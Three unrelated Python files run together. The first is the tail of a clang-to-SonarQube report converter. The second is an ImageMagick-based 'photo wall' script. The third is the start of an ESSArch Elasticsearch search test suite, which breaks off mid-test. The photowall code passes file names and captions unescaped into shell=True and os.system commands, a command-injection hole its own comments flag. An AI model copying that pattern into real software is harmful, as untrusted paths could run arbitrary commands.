                 '<results>\n')
    return report


def ReadCompilerReportFile():
    """Read the formatted compiler report and return its lines.

    BUG FIX: the handle was never closed and the local shadowed the
    ``file`` builtin; use a context manager instead.
    """
    with open('clang_compiler_report_formatted', 'r') as report:
        return report.readlines()


def CloseOutputFile():
    # Write the closing tag and release the global report handle opened
    # by CreateOutputFile().
    clang_sonar_report.write('</results>\n')
    clang_sonar_report.close()


def WriteSonarRulesToOutputFile():
    """Convert every raw diagnostic line in the global report to XML."""
    for diagnostic in clang_compiler_report:
        ConvertDiagnosticLineToSonqarqube(diagnostic)


if __name__ == '__main__':
    # Globals shared by the helpers above: the output XML handle and the
    # list of raw diagnostic lines.
    clang_sonar_report = CreateOutputFile()
    clang_compiler_report = ReadCompilerReportFile()

    WriteSonarRulesToOutputFile()
    CloseOutputFile()

#!/usr/bin/env python

import os
import tempfile
import pipes
import subprocess
import time
import random
import shutil

try:
  from wand.image import Image
  from wand.display import display
except ImportError as e:
  # cd /usr/lib/
  # ln -s libMagickWand-6.Q16.so libMagickWand.so
  print("Couldn't import Wand package.")
  print("Please refer to #http://dahlia.kr/wand/ to install it.")
  import traceback; traceback.print_exc()
  raise e

try:
  import magic
  mime = magic.Magic()
except ImportError:
  mime = None
  #https://github.com/ahupp/python-magic

try:
  from docopt import docopt
except ImportError:
  print("Couldn't import Docopt package.")
  print("Please refer to#https://github.com/docopt/docopt to install it.")
  print("/!\\ Option parsing not possible, defaulting to hardcoded values/!\\")

def to_bool(val):
  """Convert a docopt option value to bool; None counts as False.

  BUG FIX: returned the undefined name ``false`` (a NameError at
  runtime) instead of ``False`` when val is None.
  """
  if val is None:
    return False
  return val == 1
  
def to_int(val):
  """Convert a docopt option value to an integer."""
  return int(val)
  
def to_str(val):
  """Identity conversion; docopt already yields strings."""
  return val

def to_path(val):
  """Identity conversion; paths are kept as plain strings."""
  return val

# Maps each command-line option to its PARAMS key and converter function.
OPT_TO_KEY = {
 '--do-wrap'          : ("DO_WRAP", to_bool),
 '--line-height'      : ("LINE_HEIGHT", to_int),
 '--nb-lines'         : ('LINES', to_int),
 '--no-caption'       : ("WANT_NO_CAPTION", to_bool),
 # BUG FIX: --force-vfs / --force-no-vfs were mapped to each other's
 # PARAMS key, inverting the user's choice.
 '--force-no-vfs'     : ("FORCE_NO_VFS", to_bool),
 '--force-vfs'        : ("FORCE_VFS", to_bool),
 '--pick-random'      : ("PICK_RANDOM", to_bool),
 '--put-random'       : ("PUT_RANDOM", to_bool),
 '--resize'           : ("DO_RESIZE", to_bool),
 '--sleep'            : ('SLEEP_TIME', to_int),
 '--width'            : ('WIDTH', to_int),
 '--no-switch-to-mini': ("NO_SWITCH_TO_MINI", to_bool),
 '<path>'             : ('PATH', to_path),
 '<target>'           : ('TARGET', to_path),
 '--polaroid'         : ("DO_POLAROID", to_bool),
 '--format'           : ("IMG_FORMAT_SUFFIX", to_str),
 '--crop-size'        : ("CROP_SIZE", to_int),
 # NOTE(review): '~~use-vfs' looks like a typo for '--use-vfs', but no
 # such option exists in the usage string, so the key is kept as-is.
 '~~use-vfs'          : ("USE_VFS", to_bool),
 '--help'             : ("HELP", to_bool)
}

# Reverse map: PARAMS key -> (option name, converter).
KEY_TO_OPT = dict([(key, (opt, ttype)) for opt, (key, ttype) in OPT_TO_KEY.items()])

# Hardcoded defaults; overridden by docopt arguments in __main__.
PARAMS = {
"PATH" : "/home/kevin/mount/first",
"TARGET" : "/tmp/final.png",
# width of the final picture, in pixels
"WIDTH" : 2000,

# how many rows the wall has
"LINES": 2,

# height of a single row, in pixels
"LINE_HEIGHT": 200,

# minimum width of a cropped image; below that it is skipped to the
# next row instead (POLAROID mode only)
"CROP_SIZE": 1000,

"IMG_FORMAT_SUFFIX": ".png",

# False if PATH is a normal directory, True if it is WebAlbums-FS
"USE_VFS": False,
"FORCE_VFS": False,
"FORCE_NO_VFS": False,

# True if end-of-line photos are wrapped to the next line
"DO_WRAP": False,
# True if we want a black background and white frame, plus details
"DO_POLAROID": True,

"WANT_NO_CAPTION": True,

# True to place pictures at random positions (random_wall mode)
"PUT_RANDOM": False,

"DO_RESIZE": False,

### VFS options ###

"NO_SWITCH_TO_MINI": False,

### Directory options ###

# True to pick directory images randomly instead of sequentially
"PICK_RANDOM": False, #not implemented yet

## Random wall options ##
# seconds to sleep between two random placements
"SLEEP_TIME": 0,

"HELP": False
}

# Snapshots of the defaults: keyed by PARAMS name, and by option name
# (the latter feeds the %(...)s placeholders of the usage string).
DEFAULTS = dict(PARAMS.items())
DEFAULTS_docstr = dict((KEY_TO_OPT[key][0], value) for key, value in PARAMS.items())

# docopt usage/help string; the %(--opt)X placeholders are interpolated
# from DEFAULTS_docstr so the help always shows the hardcoded defaults.
usage = """Photo Wall for WebAlbums 3.

Usage: 
  photowall.py <path> <target> [options]

Arguments:
  <path>        The path where photos are picked up from. [default: %(<path>)s]
  <target>      The path where the target photo is written. Except in POLAROID+RANDOM mode, the image will be blanked out first. [default: %(<target>)s]

Options:
  --polaroid              Use polaroid-like images for the wall
  --width <width>         Set final image width. [default: %(--width)d]
  --nb-lines <nb>         Number on lines of the target image. [default: %(--nb-lines)d]
  --resize                Resize images before putting in the wall. [default: %(--resize)s]
  --line-height <height>  Set the height of a single image. [default: %(--line-height)d]
  --do-wrap               If not POLAROID, finish images on the next line. [default: %(--do-wrap)s]
  --help                  Display this message

Polaroid mode options:
  --crop-size <crop>      Minimum size to allow cropping an image. [default: %(--crop-size)s]
  --no-caption            Disable caption. [default: %(--no-caption)s] 
  --put-random            Put images randomly instead of linearily. [default: %(--put-random)s]
  --sleep <time>          If --put-random, time (in seconds) to go asleep before adding a new image. [default: %(--sleep)d]

Filesystem options:
  --force-vfs             Treat <path> as a VFS filesystem. [default: %(--force-vfs)s]
  --force-no-vfs          Treat <path> as a normal filesystem. [default: %(--force-no-vfs)s]
  --no-switch-to-mini     If VFS, don't switch from the normal image to the miniature. [default: %(--no-switch-to-mini)s]
  --pick-random           If not VFS, pick images randomly in the <path> folder. [default: %(--pick-random)s]
  """ % DEFAULTS_docstr


class UpdateCallback:
  """Progress hooks used by photowall()/random_wall().

  This default implementation just prints; a GUI front-end can replace
  the module-level ``updateCB`` instance with its own subclass.
  """

  def newExec(self):
    # A new wall build is starting.
    pass
  
  def newImage(self, row=0, col=0, filename=""):
    # One source image was placed at (row, col).
    print("%d.%d > %s" % (row, col, filename))
    
  def updLine(self, row, tmpLine):
    # Row *row* was updated; tmpLine is the row's temp image path.
    #print("--- %d ---" % row)
    pass
  
  def newFinal(self, name):
    # The assembled wall was (re)written to *name*.
    pass
  
  def finished(self, name):
    # Build finished; *name* is the final path, or None on failure.
    print("==========")

  def stopRequested(self):
    # Return True to abort the build at the next checkpoint.
    return False
  
  def checkPause(self):
    # Hook allowing a front-end to block while paused.
    pass

# Module-level callback instance shared by the builder functions.
updateCB = UpdateCallback()

if __name__ == "__main__":
    arguments = docopt(usage, version="3.5-dev")

    if arguments["--help"]:
        print(usage)
        exit()

    # Convert each docopt option to its PARAMS key and typed value, then
    # overlay the result onto the hardcoded defaults.
    param_args = dict([(OPT_TO_KEY[opt][0], OPT_TO_KEY[opt][1](value)) for opt, value in arguments.items()])

    PARAMS = dict(PARAMS, **param_args)

###########################################

###########################################

# Last path handed out by get_next_file_vfs(); unlinked on the next call
# so the virtual filesystem advances to a new image.
previous = None
def get_next_file_vfs():
  """Return the next image path from the WebAlbums-FS mount.

  Unlinks the previously returned virtual file first, then takes the
  first non-"By Years" entry; gpx tracks are skipped by recursing via
  the global get_next_file dispatcher. Unless NO_SWITCH_TO_MINI is set,
  the resolved path is redirected to the pre-scaled miniature.
  """
  global previous
  if previous is not None:
    try:
      os.unlink(previous)
    except OSError:
      # BUG FIX: was "except OSerror" -- a typo that raised NameError
      # instead of ignoring a missing file as intended.
      pass

  files = os.listdir(PARAMS["PATH"])
  for filename in files:
    if not "By Years" in filename:
      previous = PARAMS["PATH"]+filename
      if "gpx" in previous:
        return get_next_file()
      to_return = previous
      try:
        to_return = os.readlink(to_return)
      except OSError:
        pass

      if not PARAMS["NO_SWITCH_TO_MINI"]:
        to_return = to_return.replace("/images/", "/miniatures/") + ".png"
      return to_return

def get_file_details(filename):
  """Build a short caption for *filename*.

  For VFS paths, returns "album (theme)" parsed from the resolved
  symlink; on any failure, falls back to the bare file name with its
  extension stripped and underscores turned into line breaks.
  """
  try:
    link = filename
    try:
      link = os.readlink(filename)
    except OSError:
      pass
    link = pipes.quote(link)
    # Assumed layout: .../miniatures/<theme>/<year>/<album>/<file>
    # -- TODO confirm against the actual VFS tree.
    names = link[link.index("/miniatures/" if not PARAMS["NO_SWITCH_TO_MINI"] else "/images"):].split("/")[2:]
    theme, year, album, fname = names
    
    return "%s (%s)" % (album, theme)
  except Exception as e:
    # Non-VFS (or unparsable) path: derive the caption from the name.
    #print("Cannot get details from {}: {}".format(filename, e))
    fname = get_file_details_dir(filename)
    fname = fname.rpartition(".")[0]
    fname = fname.replace("_", "\n")
    return fname

###########################################

class GetFileDir:
  """Cyclic iterator over the files of PARAMS["PATH"].

  Files are served in sorted order, or shuffled once up front when
  *randomize* is set; iteration wraps around at the end of the list.
  """

  def __init__(self, randomize):
    self.idx = 0
    self.files = os.listdir(PARAMS["PATH"])

    if len(self.files) == 0:
      raise EnvironmentError("No file available")

    self.files.sort()

    if randomize:
      print("RANDOMIZE")
      random.shuffle(self.files)

  def get_next_file(self):
    """Return the next path, wrapping around at the end of the list."""
    chosen = self.files[self.idx]
    self.idx = (self.idx + 1) % len(self.files)
    return PARAMS["PATH"] + chosen
  
def get_file_details_dir(filename):
  """Return the basename of *filename* (text after the last '/').

  Raises ValueError when the path contains no slash (rindex semantics,
  kept for compatibility with the original).
  """
  last_slash = filename.rindex("/")
  return filename[last_slash + 1:]

###########################################
###########################################


def do_append(first, second, underneath=False):
  # Append image *second* onto *first* (overwriting *first*) with
  # ImageMagick convert: -append stacks vertically, +append horizontally.
  sign = "-" if underneath else "+"
  background = "-background black" if PARAMS["DO_POLAROID"] else ""
  # NOTE(review): shell=True with interpolated file names -- paths with
  # spaces or shell metacharacters will break; confirm inputs are safe.
  command = "convert -gravity center %s %sappend %s %s %s" % (background, sign, first, second, first)
  ret = subprocess.call(command, shell=True)
  
  if ret != 0:
    raise Exception("Command failed: ", command)

def do_polaroid (image, filename=None, background="black", suffix=None):
  """Apply ImageMagick's +polaroid effect to *image* and return it.

  The image is written to a temp file, transformed by `convert`, read
  back with Wand, and resized to the original dimensions. When captions
  are enabled, the text comes from get_file_details(filename).
  """
  if suffix is None:
    suffix = PARAMS["IMG_FORMAT_SUFFIX"]
  tmp = tempfile.NamedTemporaryFile(delete=False, suffix=suffix)
  tmp.close()
  image.save(filename=tmp.name)
  
  if not(PARAMS["WANT_NO_CAPTION"]) and filename:
    details = get_file_details(filename)
    caption = """-caption "%s" """ % details.replace("'", "\\'")
  else:
    caption = ""
    
  # NOTE(review): shell=True with an interpolated caption; relies on
  # get_file_details() output being shell-safe -- confirm.
  command = "convert -bordercolor snow -background %(bg)s -gravity center %(caption)s +polaroid %(name)s %(name)s" % {"bg" : background, "name":tmp.name, "caption":caption}
    
  ret = subprocess.call(command, shell=True)
  if ret != 0:
    raise Exception("Command failed: "+ command)
  
  img = Image(filename=tmp.name).clone()
  
  # The clone lives in memory, so the temp file can go away now.
  os.unlink(tmp.name)
  
  img.resize(width=image.width, height=image.height)

  return img

def do_blank_image(height, width, filename, color="black"):
  """Write a solid-color canvas of the given size to *filename*."""
  command = "convert -size %dx%d xc:%s %s" % (width, height, color, filename)

  if subprocess.call(command, shell=True) != 0:
    raise Exception("Command failed: "+ command)

def do_polaroid_and_random_composite(target_filename, target, image, filename):
  """Polaroid-frame *image* and composite it at a random position onto
  the wall image stored at *target_filename*."""
  PERCENT_IN = 100
  
  image = do_polaroid(image, filename, background="transparent", suffix=".png")

  tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
  image.save(filename=tmp.name)

  # Random offset, expressed relative to the centre of the target
  # (gravity center below).
  height = random.randint(0, target.height - image.height) - target.height/2
  width = random.randint(0, target.width - image.width) - target.width/2

  geometry = ("+" if height >= 0 else "") + str(height) + ("+" if width >= 0 else "") + str(width)

  command = "composite -geometry %s  -compose Over -gravity center %s %s %s" % (geometry, tmp.name, target_filename, target_filename)
  ret = os.system(command)
  os.unlink(tmp.name)
  
  if ret != 0:
    # BUG FIX: was "raise object('failed')" -- object() takes no
    # arguments, so that line itself raised TypeError instead of
    # reporting the composite failure.
    raise Exception("Command failed: " + command)

def photowall(name):
  """Build a linear photo wall of PARAMS["LINES"] rows and write it to
  *name*.

  Rows are assembled image by image until PARAMS["WIDTH"] is reached;
  completed rows are appended underneath the accumulated result. Uses
  temp files for intermediate rows and the global get_next_file
  dispatcher for input.
  """
  output_final = None

  # Leftover part of a split image, carried into the next row.
  previous_filename = None
  #for all the rows, 
  for row in range(PARAMS["LINES"]):    
    output_row = None
    row_width = 0
    #concatenate until the image width is reached
    img_count = 0
    while row_width < PARAMS["WIDTH"]:
      # get a new file, or the end of the previous one, if it was split
      filename = get_next_file() if previous_filename is None else previous_filename
      mimetype = None
      previous_filename = None
      
      # get a real image (resolve symlinks, skip non-images)
      if mime is not None:
        mimetype = mime.from_file(filename)
        if "symbolic link" in mimetype:
          filename = os.readlink(filename)
          mimetype = mime.from_file(filename)
        
        if not "image" in mimetype:
          continue
      else:
        # No python-magic available: best-effort symlink resolution only.
        try:
          filename = os.readlink(filename)
        except OSError:
          pass
      
      updateCB.newImage(row, img_count, filename)
      img_count += 1
      # resize the image to the row height, preserving aspect ratio
      image = Image(filename=filename)
      with image.clone() as clone:
        factor = float(PARAMS["LINE_HEIGHT"])/clone.height
        clone.resize(height=PARAMS["LINE_HEIGHT"], width=int(clone.width*factor))
        #if the new image makes an overflow
        if row_width + clone.width  > PARAMS["WIDTH"]:
          #compute how many pixels will overflow
          overflow = row_width + clone.width - PARAMS["WIDTH"]
          will_fit = clone.width - overflow
          
          # In polaroid mode a sliver narrower than CROP_SIZE looks bad:
          # close this row and retry the image on the next one.
          if PARAMS["DO_POLAROID"] and will_fit < PARAMS["CROP_SIZE"]:
            row_width = PARAMS["WIDTH"]
            previous_filename = filename
            print("Doesn't fit")
            continue
          
          if PARAMS["DO_WRAP"]:
            # Save the cut-off remainder; it seeds the next row.
            with clone.clone() as next_img:
              next_img.crop(will_fit+1, 0, width=overflow, height=PARAMS["LINE_HEIGHT"])
              tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
              tmp.close()
              next_img.save(filename=tmp.name)
              previous_filename = tmp.name
          clone.crop(0, 0, width=will_fit, height=PARAMS["LINE_HEIGHT"])
        
        if PARAMS["DO_POLAROID"]:
          clone = do_polaroid(clone, filename)
        
        tmp = tempfile.NamedTemporaryFile(delete=False, suffix=PARAMS["IMG_FORMAT_SUFFIX"])
        tmp.close()
        clone.save(filename=tmp.name)
        
        row_width += clone.width
        # First image starts the row; later ones are appended to it.
        if output_row is not None:
          do_append(output_row.name, tmp.name)
          os.unlink(tmp.name)
        else:
          output_row = tmp
        
        updateCB.updLine(row, output_row.name)
        updateCB.checkPause()
        
        if updateCB.stopRequested():
          break
    else:
      # while/else: only runs when the row completed without a stop
      # request; append the finished row to the wall.
      if output_final is not None:
        do_append(output_final.name, output_row.name, underneath=True)
        os.unlink(output_row.name)
      else:
        output_final = output_row
      updateCB.newFinal(output_final.name)
  
  if output_final is not None:
    shutil.move(output_final.name, name)
    updateCB.finished(name)
  else:
    updateCB.finished(None)
    
  return name 
    
def random_wall(real_target_filename):
  """Endlessly composite polaroid images at random positions onto the
  wall at *real_target_filename*.

  Works on a temp copy and re-publishes it after each placement; loops
  until the callback requests a stop, sleeping PARAMS["SLEEP_TIME"]
  seconds between placements.
  """
  # Derive a temp working path: <tmpdir>/<name>.2<ext>
  name = real_target_filename
  filename = name[name.rindex("/"):]
  name = filename[:filename.index(".")]
  ext = filename[filename.index("."):]
  target_filename = tempfile.gettempdir()+"/"+name+".2"+ext
  
  try:
    #remove any existing tmp file
    os.unlink(target_filename)
  except:
    pass
  
  try:
    #if source already exist, build up on it
    os.system("cp %s %s" % (target_filename, real_target_filename))
  except:
    pass
  
  print("Target file is %s" % real_target_filename )
  target = None
  if mime is not None:
    # Reuse the existing wall image if it is actually an image.
    try:
      mimetype = mime.from_file(target_filename)
      if "symbolic link" in mimetype:
        filename = os.readlink(target_filename)
        mimetype = mime.from_file(target_filename)
        
      if "image" in mimetype:
        target = Image(filename=target_filename)
      
    except IOError:
      pass

  if target is None:
    # Start from a blank canvas sized like the linear wall.
    height = PARAMS["LINES"] * PARAMS["LINE_HEIGHT"]
    do_blank_image(height, PARAMS["WIDTH"], target_filename)
    target = Image(filename=target_filename)
  
  cnt = 0
  while True:
    updateCB.checkPause()
    if updateCB.stopRequested():
      break
      
    filename = get_next_file()
    print(filename)
    
    img = Image(filename=filename)
    with img.clone() as clone:
      if PARAMS["DO_RESIZE"]:
        factor = float(PARAMS["LINE_HEIGHT"])/clone.height
        clone.resize(width=int(clone.width*factor), height=int(clone.height*factor))
                     
      do_polaroid_and_random_composite(target_filename, target, clone, filename)
      updateCB.checkPause()
      if updateCB.stopRequested():
        break
      updateCB.newImage(row=cnt, filename=filename)
      updateCB.newFinal(target_filename)
      # Publish the updated wall to the real destination.
      os.system("cp %s %s" % (target_filename, real_target_filename))
      cnt += 1
      
    updateCB.checkPause()
    if updateCB.stopRequested():
      break  
    time.sleep(PARAMS["SLEEP_TIME"])
    updateCB.checkPause()
    if updateCB.stopRequested():
      break
      
# Input dispatcher bound by fix_args(): either GetFileDir(...).get_next_file
# or get_next_file_vfs.
get_next_file = None

def path_is_jnetfs(path):
  # Detect a JnetFS (WebAlbums-FS) mount by reading the filesystem name
  # from `df` output (second line, after the header).

  df_output_lines = os.popen("df -Ph '%s'" % path).read().splitlines()
  
  return df_output_lines and "JnetFS" in df_output_lines[1]

def fix_args():
  """Normalise PARAMS after option parsing and bind the file iterator.

  Ensures PATH ends with '/', resolves USE_VFS from the --force-vfs /
  --force-no-vfs overrides (falling back to autodetection), and sets the
  global get_next_file dispatcher accordingly.
  """
  global get_next_file
  
  if PARAMS["PATH"][-1] != "/":
    PARAMS["PATH"] += "/"
  
  # BUG FIX: both branches tested FORCE_NO_VFS and evaluated
  # PARAMS["USE_VFS"] as a bare (no-op) expression, so the force flags
  # were silently ignored; assign the intended values instead.
  if PARAMS["FORCE_VFS"]:
    PARAMS["USE_VFS"] = True
  elif PARAMS["FORCE_NO_VFS"]:
    PARAMS["USE_VFS"] = False
  else:
    PARAMS["USE_VFS"] = path_is_jnetfs(PARAMS["PATH"])

  if not PARAMS["USE_VFS"]:
    get_next_file = GetFileDir(PARAMS["PICK_RANDOM"]).get_next_file
  else:
    get_next_file = get_next_file_vfs

def do_main():
  """Entry point: normalise params, then build either a linear wall or a
  continuously updated random wall."""
  fix_args()

  updateCB.newExec()
  target = PARAMS["TARGET"]
  if PARAMS["PUT_RANDOM"]:
    random_wall(target)
  else:
    photowall(target)

if __name__== "__main__":
    # Script entry point.
    do_main()

import time
from datetime import datetime
from pydoc import locate
from unittest import SkipTest

from countries_plus.models import Country
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.test import override_settings, tag
from django.urls import reverse
from django.utils import timezone
from django.utils.timezone import make_aware
from elasticsearch.client import IngestClient
from elasticsearch.exceptions import ConnectionError
from elasticsearch_dsl.connections import (
    connections,
    get_connection as get_es_connection,
)
from languages_plus.models import Language
from rest_framework import status
from rest_framework.test import APITestCase, APITransactionTestCase

from ESSArch_Core.agents.models import (
    Agent,
    AgentTagLink,
    AgentTagLinkRelationType,
    AgentType,
    MainAgentType,
    RefCode,
)
from ESSArch_Core.auth.models import Group, GroupType
from ESSArch_Core.configuration.models import Feature
from ESSArch_Core.ip.models import InformationPackage
from ESSArch_Core.maintenance.models import AppraisalJob
from ESSArch_Core.search import alias_migration
from ESSArch_Core.tags.documents import (
    Archive,
    Component,
    File,
    StructureUnitDocument,
)
from ESSArch_Core.tags.models import (
    Structure,
    StructureType,
    StructureUnit,
    StructureUnitType,
    Tag,
    TagStructure,
    TagVersion,
    TagVersionType,
)

User = get_user_model()


def get_test_client(nowait=False):
    """Return an Elasticsearch client once the cluster reports yellow.

    Tries once when *nowait* is set, otherwise up to five times with a
    short pause between attempts, and skips the test run (SkipTest) if
    the cluster never becomes reachable.
    """
    client = get_es_connection('default')

    attempts = 1 if nowait else 5
    for _ in range(attempts):
        try:
            client.cluster.health(wait_for_status="yellow")
        except ConnectionError:
            time.sleep(0.1)
        else:
            return client
    # Every attempt failed: treat Elasticsearch as unavailable.
    raise SkipTest("Elasticsearch failed to start")


class ESSArchSearchBaseTestCaseMixin:
    """Mixin wiring Django test cases to a live Elasticsearch cluster.

    Configures the ES connections before normal test-case setup,
    installs the ``ingest_attachment`` pipeline, (re)creates all
    configured indexes per test, and wipes indexes/templates afterwards.
    """

    @staticmethod
    def _get_client():
        # Indirection point so subclasses can substitute a different client.
        return get_test_client()

    @classmethod
    def setUpClass(cls):
        # Enable overridden settings manually *before* super().setUpClass()
        # so ELASTICSEARCH_CONNECTIONS is already overridden when the ES
        # connections are configured below.
        if cls._overridden_settings:
            cls._cls_overridden_context = override_settings(**cls._overridden_settings)
            cls._cls_overridden_context.enable()

        connections.configure(**settings.ELASTICSEARCH_CONNECTIONS)
        cls.es_client = cls._get_client()

        # Ingest pipeline for file attachments: extract text from the
        # 'data' field (no character limit), then drop the raw payload.
        IngestClient(cls.es_client).put_pipeline(id='ingest_attachment', body={
            'description': "Extract attachment information",
            'processors': [
                {
                    "attachment": {
                        "field": "data",
                        "indexed_chars": "-1"
                    },
                    "remove": {
                        "field": "data"
                    }
                }
            ]
        })

        super().setUpClass()

    def setUp(self):
        # (Re)create every configured index so each test starts clean.
        for _index_name, index_class in settings.ELASTICSEARCH_INDEXES['default'].items():
            doctype = locate(index_class)
            alias_migration.setup_index(doctype)

    def tearDown(self):
        # Remove all indexes and index templates created during the test.
        self.es_client.indices.delete(index="*", ignore=404)
        self.es_client.indices.delete_template(name="*", ignore=404)


@override_settings(ELASTICSEARCH_CONNECTIONS=settings.ELASTICSEARCH_TEST_CONNECTIONS)
@tag('requires-elasticsearch')
class ESSArchSearchBaseTestCase(ESSArchSearchBaseTestCaseMixin, APITestCase):
    """Elasticsearch-backed API test case using the test ES connections."""
    pass


@override_settings(ELASTICSEARCH_CONNECTIONS=settings.ELASTICSEARCH_TEST_CONNECTIONS)
@tag('requires-elasticsearch')
class ESSArchSearchBaseTransactionTestCase(ESSArchSearchBaseTestCaseMixin, APITransactionTestCase):
    """Transactional variant for tests that need real DB transactions."""
    pass


class ComponentSearchTestCase(ESSArchSearchBaseTestCase):
    """Tests for searching component and archive tags via the search endpoint."""

    fixtures = ['countries_data', 'languages_data']

    @classmethod
    def setUpTestData(cls):
        """Create the shared user, two organization groups and tag version types."""
        cls.url = reverse('search-list')
        Feature.objects.create(name='archival descriptions', enabled=True)
        cls.user = User.objects.create()
        permission = Permission.objects.get(codename='search')
        cls.user.user_permissions.add(permission)

        org_group_type = GroupType.objects.create(codename='organization')

        # The user belongs to both organizations; tests switch the active one.
        cls.group1 = Group.objects.create(name='group1', group_type=org_group_type)
        cls.group1.add_member(cls.user.essauth_member)

        cls.group2 = Group.objects.create(name='group2', group_type=org_group_type)
        cls.group2.add_member(cls.user.essauth_member)

        cls.component_type = TagVersionType.objects.create(name='component', archive_type=False)
        cls.archive_type = TagVersionType.objects.create(name='archive', archive_type=True)

    def setUp(self):
        super().setUp()
        self.client.force_authenticate(user=self.user)

    @staticmethod
    def create_agent():
        """Create a minimal Agent with the required related objects."""
        return Agent.objects.create(
            type=AgentType.objects.create(main_type=MainAgentType.objects.create()),
            ref_code=RefCode.objects.create(
                country=Country.objects.get(iso='SE'),
                repository_code='repo',
            ),
            level_of_detail=0,
            record_status=0,
            script=0,
            language=Language.objects.get(iso_639_1='sv'),
            create_date=timezone.now(),
        )

    def test_search_component(self):
        """Components are searchable, and archive membership gates visibility by organization."""
        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        with self.subTest('without archive'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        # Grant only group1 access to the archive.
        self.group1.add_object(archive_tag_version)
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        # Place the component under the archive, then re-index it.
        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)
        Component.index_documents(remove_stale=True)

        with self.subTest('with archive'):
            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)
            self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

        with self.subTest('with archive, non-active organization'):
            # Switching to group2 (no access to the archive) hides the hit.
            self.user.user_profile.current_organization = self.group2
            self.user.user_profile.save()

            res = self.client.get(self.url)
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

    def test_filter_on_component_agent(self):
        """Filtering by agent matches components linked directly to the agent."""
        agent = self.create_agent()

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)

        # Link the agent to the *component* version before indexing.
        AgentTagLink.objects.create(
            agent=agent,
            tag=component_tag_version,
            type=AgentTagLinkRelationType.objects.create(),
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        res = self.client.get(self.url, {'agents': str(agent.pk)})
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

    def test_filter_on_archive_agent(self):
        """Filtering by agent also matches components whose *archive* is linked to the agent."""
        agent = self.create_agent()

        component_tag = Tag.objects.create()
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )

        structure_type = StructureType.objects.create()
        structure_template = Structure.objects.create(type=structure_type, is_template=True)

        archive_tag = Tag.objects.create()
        archive_tag_version = TagVersion.objects.create(
            tag=archive_tag,
            type=self.archive_type,
            elastic_index="archive",
        )
        structure, archive_tag_structure = structure_template.create_template_instance(archive_tag)
        Archive.from_obj(archive_tag_version).save(refresh='true')

        TagStructure.objects.create(tag=component_tag, parent=archive_tag_structure, structure=structure)

        # Link the agent to the *archive* version, not the component.
        AgentTagLink.objects.create(
            agent=agent,
            tag=archive_tag_version,
            type=AgentTagLinkRelationType.objects.create(),
        )
        Component.from_obj(component_tag_version).save(refresh='true')

        res = self.client.get(self.url, {'agents': str(agent.pk)})
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data['hits']), 1)
        self.assertEqual(res.data['hits'][0]['_id'], str(component_tag_version.pk))

    def test_filter_appraisal_date(self):
        """The appraisal_date_after/before filters behave as an inclusive range."""
        component_tag = Tag.objects.create(appraisal_date=make_aware(datetime(year=2020, month=1, day=1)))
        component_tag_version = TagVersion.objects.create(
            tag=component_tag,
            type=self.component_type,
            elastic_index="component",
        )
        doc = Component.from_obj(component_tag_version)
        doc.save(refresh='true')

        with self.subTest('2020-01-01 is after or equal to 2020-01-01'):
            res = self.client.get(self.url, data={'appraisal_date_after': '2020-01-01'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 not after 2020-01-02'):
            res = self.client.get(self.url, data={'appraisal_date_after': '2020-01-02'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 not before 2019-12-31'):
            res = self.client.get(self.url, data={'appraisal_date_before': '2019-12-31'})
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 0)

        with self.subTest('2020-01-01 between 2019-01-01 and 2020-01-01'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2019-01-01',
                'appraisal_date_before': '2020-01-01',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 between 2020-01-01 and 2020-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-01-01',
                'appraisal_date_before': '2020-12-31',
            })
            self.assertEqual(res.status_code, status.HTTP_200_OK)
            self.assertEqual(len(res.data['hits']), 1)

        with self.subTest('2020-01-01 not between 2020-01-02 and 2020-12-31'):
            res = self.client.get(self.url, data={
                'appraisal_date_after': '2020-01-02',
                'appraisal_date_before': '2020-12-31',
            })
